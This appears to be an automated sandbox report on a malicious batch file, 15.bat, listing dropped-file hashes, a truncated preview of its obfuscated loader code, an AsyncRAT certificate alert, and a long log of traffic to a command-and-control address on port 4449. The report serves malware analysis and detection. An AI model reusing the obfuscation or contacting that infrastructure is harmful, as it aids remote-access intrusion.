SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69993 |
Entropy (8bit): | 7.99584879649948 |
Encrypted: | true |
SSDEEP: | 1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr |
MD5: | 29F65BA8E88C063813CC50A4EA544E93 |
SHA1: | 05A7040D5C127E68C25D81CC51271FFB8BEF3568 |
SHA-256: | 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184 |
SHA-512: | E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 330 |
Entropy (8bit): | 3.139206469813435 |
Encrypted: | false |
SSDEEP: | 6:kKBlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:JlMkPlE99SNxAhUeVLVt |
MD5: | A3DACFA0F0F602EEB4894B54ED7228F1 |
SHA1: | 856A6B3CC26B92BEDAA5D0598A467BC457D1C052 |
SHA-256: | 3E97091CB04ED8491BBEB056667718E4FB73EB5E5B060A2BCE892F8F55758747 |
SHA-512: | 95831E9410F9D6173A01B840C3416C5C407ED2E3E669405243DA97622E743E6B7CD1AFBCFC2E6EBE98A783280E1D963F52108D5CF2AE609743B3ABE452C40450 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9713 |
Entropy (8bit): | 4.93568648418653 |
Encrypted: | false |
SSDEEP: | 192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o |
MD5: | A7EDDF0DCC37957ABAFE63CE6D0BE4CA |
SHA1: | 5B09680EF1C3C405D698481E1364BE0C412C7A9C |
SHA-256: | B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327 |
SHA-512: | A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2832 |
Entropy (8bit): | 5.414030276061799 |
Encrypted: | false |
SSDEEP: | 48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz |
MD5: | BAF5A10C59FD93E444E5B672D7CCB1D4 |
SHA1: | 906BB875AB47D641756F44E09633F75AFDDDD638 |
SHA-256: | B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637 |
SHA-512: | B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8 |
Entropy (8bit): | 2.75 |
Encrypted: | false |
SSDEEP: | 3:Rt:v |
MD5: | CF759E4C5F14FE3EEC41B87ED756CEA8 |
SHA1: | C27C796BB3C2FAC929359563676F4BA1FFADA1F5 |
SHA-256: | C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761 |
SHA-512: | C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2134 |
Entropy (8bit): | 5.765159968838168 |
Encrypted: | false |
SSDEEP: | 48:kdSNM0GgCsFm5AIP+TKR23R98Rx+BLB0cfPBkqkwArX1xngW3JVFgntlYcW3IS:kI1T+AIG+E307+BLB0cf3S1GMonn6H |
MD5: | 44936E2D6C7772C5ABB7AD1399222214 |
SHA1: | 3F8C2BE67E603E708C15E866C7F6F227A666DA4F |
SHA-256: | 65A32A02EE58510D7F5D7DFE3D0D7F0E5D41F31C80456A6E457ACEA9C861A7BA |
SHA-512: | 38CEB16C2B383395DFFD4C0EBE5DFF0BA5EE5F7252C543D7733A2CA615D4058028DC976B883DF91342B18AA117A72BFC5A96A73FBDAF51E3BC19DC37BC9B9E38 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.003197930819005 |
TrID: | |
File name: | 15.bat |
File size: | 62'382 bytes |
MD5: | 1bf971e48ba0ca904319be9147a96c33 |
SHA1: | 75078fd8b6a000b848eb3f372e5f84fb58d5b98e |
SHA256: | 74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e |
SHA512: | e24d8d46a962c1d659a742a1926c6628f9e88268449b36a93bba5def5390eca141903e329afd3eda70f79cc391f8391e9f15639918addc923819a3efe3dcc6d0 |
SSDEEP: | 1536:pdgEdB7d8SZXy3SMlwVdgC1mKRkm6DUL9:paEdNGSsSR3sKRkrDo |
TLSH: | 5E53E1082BAB879758AAD418DFC570C709C799875DB8FAF45F5B202A21B7A3340F5723 |
File Content Preview: | @echo off..set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh"..set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh"..set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh..if %pEXfDe:WiB |
Icon Hash: | 9686878b929a9886 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/20/24-10:06:05.477978 | TCP | 2850454 | ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 20, 2024 10:06:05.059465885 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:05.261924982 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:05.262198925 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:05.274139881 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:05.477977991 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:05.483889103 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:05.690464973 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:05.744736910 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:06.648036957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:06.902771950 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:06.902887106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:07.155409098 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:18.809006929 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:19.056802988 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:19.057018042 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:19.262202978 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:19.307322979 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:19.509840012 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:19.519445896 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:19.775299072 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:19.775485039 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:20.025736094 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:30.979486942 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:31.228714943 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:31.228943110 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:31.432890892 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:31.479065895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:31.681679964 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:31.683608055 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:31.931751966 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:31.931982040 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:32.181802988 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:43.151253939 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:43.400309086 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:43.400445938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:43.604294062 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:43.650942087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:43.853630066 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:43.855947018 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:44.103606939 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:44.103995085 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:44.353465080 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:55.323198080 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:55.572362900 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:55.572725058 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:55.776315928 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:55.822690964 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:56.025016069 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:56.027904987 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:56.275512934 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:06:56.275585890 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:06:56.525357008 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:07.495194912 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:07.755770922 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:07.756006002 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:07.961678982 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:08.010253906 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:08.212491035 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:08.214807034 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:08.463056087 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:08.463587999 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:08.712913036 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:19.666765928 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:19.934175014 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:19.934254885 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:20.141429901 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:20.198467970 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:20.401392937 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:20.406703949 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:20.650386095 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:20.651022911 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:20.900355101 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:22.026459932 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:22.275502920 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:22.275700092 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:22.480595112 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:22.528429031 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:22.730786085 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:22.732867002 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:22.984918118 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:22.985029936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:23.228439093 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:29.729351997 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:29.973160982 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:29.973376989 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:30.190988064 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:30.247123957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:30.451072931 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:30.460215092 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:30.717386007 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:30.718559980 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:30.964899063 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:32.480415106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:32.736882925 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:32.744522095 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:32.948529959 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:32.996409893 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:33.198892117 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:33.200830936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:33.449378967 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:33.449595928 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:33.700222969 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:40.229461908 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:40.479999065 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:40.480170012 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:40.684878111 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:40.732491970 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:40.934772015 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:40.942718983 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:41.185695887 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:41.185875893 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:41.446069956 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:42.604384899 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:42.856275082 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:42.856513977 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:43.061203003 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:43.119560957 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:43.322320938 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:43.324009895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:43.573316097 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:43.573470116 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:43.824323893 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:48.057461977 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:48.305768013 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:48.312654972 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:48.515990019 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:48.560404062 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:48.762583017 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:48.808504105 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:49.792742968 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:50.040802002 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:50.041009903 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:50.300483942 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:50.916908979 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.168148994 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:51.168235064 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.372733116 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:51.510231972 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.697361946 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:51.697582960 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.699353933 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.713212967 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:51.713397980 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:51.949495077 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:51.949584007 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:52.193243980 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:52.193310976 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:52.397648096 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:52.468470097 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:52.670485020 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:52.678183079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:52.933837891 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:07:52.934040070 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:07:53.188455105 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:03.812464952 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:04.056381941 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:04.056665897 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:04.267549038 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:04.335030079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:04.537292004 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:04.539304972 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:04.793234110 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:04.793421984 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:05.039024115 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:14.837532043 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:14.888324976 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.090497971 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.090697050 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.091054916 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.293323040 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.293545008 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.298180103 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.298404932 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.495788097 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:08:15.497634888 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:08:15.565115929 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
